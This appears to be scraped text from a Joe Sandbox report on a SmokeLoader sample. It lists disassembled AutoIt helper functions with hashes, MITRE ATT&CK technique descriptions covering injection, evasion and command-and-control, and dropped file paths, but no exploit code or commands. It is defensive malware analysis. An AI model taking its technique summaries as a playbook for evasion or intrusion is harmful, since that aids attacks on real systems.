Instruction ID: 61dddcfd631e865d81cce134ebc4eb6f96aa39c9ce4055007e42606d57294a85
Opcode Fuzzy Hash: 6e57302d381f97efc8b8450eec4db0664f690fd0eadc0b0488422784e00c3682
Instruction Fuzzy Hash: 4801D471A81104ABCB18FBA0D95AFFFB3ACAF51300F50011DB911A3281DE285E0897B2

Function 007C993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 007C99A6

Strings

ListBox, xrefs: 007C9972
ComboBox, xrefs: 007C9947

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 17d88c6bb1221b2fb53f1e8d0e2ff0781d7aae3804727a97fb2743ab0d2446a7
Instruction ID: 6cc0bcb3c0cd981ecb90640f3652279efbca669d0b47d6a0e0b3f360c4b68e61
Opcode Fuzzy Hash: 17d88c6bb1221b2fb53f1e8d0e2ff0781d7aae3804727a97fb2743ab0d2446a7
Instruction Fuzzy Hash: 9A01A772A81114A7CB14FBB4DA1AFFFB3AD9F51340F50011DBD55A3281DE2D5E089672

Function 007D54E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 007D5501
_wcscmp.LIBCMT ref: 007D5513

Strings

#32770, xrefs: 007D550D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 2829d67f0709f0432143c263f0e48a52d88063fc225e2b3796121073edd9461c
Instruction ID: 6cd91caf83d1c2decee56f3c6e0d8354eea74dfdf1c7b6275e35adbfbb63af86
Opcode Fuzzy Hash: 2829d67f0709f0432143c263f0e48a52d88063fc225e2b3796121073edd9461c
Instruction Fuzzy Hash: F9E068336003286BD720AB99BC49FABFBACFB44731F000017FC04D7151EA64AA408BE0

Function 007C8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007C88A0

Part of subcall function 00793588: _doexit.LIBCMT ref: 00793592

Strings

AutoIt, xrefs: 007C8894
Error allocating memory., xrefs: 007C8899

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 68a4d904a71303bc6b9121f544bc2e093650b1dacd7bf3fe2f3bce2236206b4e
Instruction ID: bf0e9c7d45b5fc796df0573616147fc6f045f454a005cc301de3f57294e7605d
Opcode Fuzzy Hash: 68a4d904a71303bc6b9121f544bc2e093650b1dacd7bf3fe2f3bce2236206b4e
Instruction Fuzzy Hash: DBD0123138536872D25432A87C1EFCA7A489B15B51F00442ABB18A55C349DE89D042A5

Function 007AB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 007AB544: _memset.LIBCMT ref: 007AB551

Part of subcall function 00790B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007AB520,?,?,?,0077100A), ref: 00790B79

IsDebuggerPresent.KERNEL32(?,?,?,0077100A), ref: 007AB524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0077100A), ref: 007AB533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007AB52E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: d6bf13a6476fa4977547d5aa5d87bc459034c74705f825cc7003803e4a8c2ccf
Instruction ID: 39677c42e90fb0ddc309390bf6c949f67c25f643f4eb54d691cd26ac28823074
Opcode Fuzzy Hash: d6bf13a6476fa4977547d5aa5d87bc459034c74705f825cc7003803e4a8c2ccf
Instruction Fuzzy Hash: D9E06DB06003118FD760AF29E809B467AE4BF44304F108A2DE456C6741DBB8D548CB91

Function 007B0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 007B0091

Part of subcall function 007EC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,007B027A,?), ref: 007EC6E7
Part of subcall function 007EC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007B0289

Strings

WIN_XPe, xrefs: 007B00A4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 566b5096925e5a280d1521b75bf0a9136b8baba88354b92426f2a839ec70a27c
Instruction ID: 22bf7818ab64315aaf982f16ca374a549dee382bd6f7090ee9dbae7e6b01ae82
Opcode Fuzzy Hash: 566b5096925e5a280d1521b75bf0a9136b8baba88354b92426f2a839ec70a27c
Instruction Fuzzy Hash: 86F0ED71805109DFCB65EBA5C998BEEBBF8BB48300F644495E146B21A0CB794F84DF61

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lSmb6nDsrC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Advocacy

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Breeding

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cyprus

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Folk

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fuji

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Mind

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Orders

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Origins

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Origins.cmd (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Titten

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Towards

Windows Analysis Report
lSmb6nDsrC.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre